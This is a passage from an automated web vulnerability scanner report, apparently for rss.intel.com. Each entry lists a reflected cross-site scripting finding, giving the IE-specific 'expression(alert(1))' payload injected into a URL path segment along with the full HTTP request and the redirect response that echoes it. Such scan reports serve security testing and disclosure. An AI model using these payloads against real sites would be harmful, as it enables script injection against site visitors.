The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5 was submitted in the REST URL parameter 6. This input was echoed as 2734c"style="x:expression(alert(1))"dfc1ad19df5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:24 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog2734c"style="x:expression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog2734c"style="x:expression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.77. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49 was submitted in the REST URL parameter 7. This input was echoed as 858f3"style="x:expression(alert(1))"f39a96aae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:29 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style="x:expression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style="x:expression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.78. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f was submitted in the REST URL parameter 8. This input was echoed as 76c51"style="x:expression(alert(1))"f5ad9d5bc7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.79. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5 was submitted in the REST URL parameter 9. This input was echoed as dadd6"style="x:expression(alert(1))"a8ffa0511c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:39 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style="x:expression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style="x:expression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.80. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 was submitted in the REST URL parameter 10. This input was echoed as fa91f"style="x:expression(alert(1))"6ea33654632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:43 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style="x:expression(alert(1))"6ea33654632?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style="x:expression(alert(1))"6ea33654632?cid=rss-258152-c1-264102">
...[SNIP]...

4.81. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80 was submitted in the REST URL parameter 2. This input was echoed as 6d862"style="x:expression(alert(1))"b65d0f7bf80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-2641026d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-2641026d862"style="x:expression(alert(1))"b65d0f7bf80
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-2641026d862"style="x:expression(alert(1))"b65d0f7bf80">
...[SNIP]...

4.82. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6 was submitted in the REST URL parameter 3. This input was echoed as e7b3c"style="x:expression(alert(1))"5cf453fb1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.come7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.come7b3c"style="x:expression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution
Content-Length: 211
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.come7b3c"style="x:expression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution">
...[SNIP]...

4.83. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5 was submitted in the REST URL parameter 4. This input was echoed as d32af"style="x:expression(alert(1))"8b71a1cc4e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/communityd32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityd32af"style="x:expression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityd32af"style="x:expression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.84. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb38a"style%3d"x%3aexpression(alert(1))"70a761bace1 was submitted in the REST URL parameter 5. This input was echoed as eb38a"style="x:expression(alert(1))"70a761bace1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroomeb38a"style%3d"x%3aexpression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomeb38a"style="x:expression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomeb38a"style="x:expression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.85. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5 was submitted in the REST URL parameter 6. This input was echoed as a85ab"style="x:expression(alert(1))"efed0610cc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/bloga85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/bloga85ab"style="x:expression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/bloga85ab"style="x:expression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.86. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa was submitted in the REST URL parameter 7. This input was echoed as df855"style="x:expression(alert(1))"2637a52c4aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011df855"style="x:expression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011df855"style="x:expression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.87. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e was submitted in the REST URL parameter 8. This input was echoed as 5460e"style="x:expression(alert(1))"ca2cafebd5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style="x:expression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style="x:expression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.88. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8580"style%3d"x%3aexpression(alert(1))"1d378863169 was submitted in the REST URL parameter 9. This input was echoed as a8580"style="x:expression(alert(1))"1d378863169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style%3d"x%3aexpression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style="x:expression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style="x:expression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.89. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d was submitted in the REST URL parameter 10. This input was echoed as bbebe"style="x:expression(alert(1))"66fe35fec0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:42 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style="x:expression(alert(1))"66fe35fec0d?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

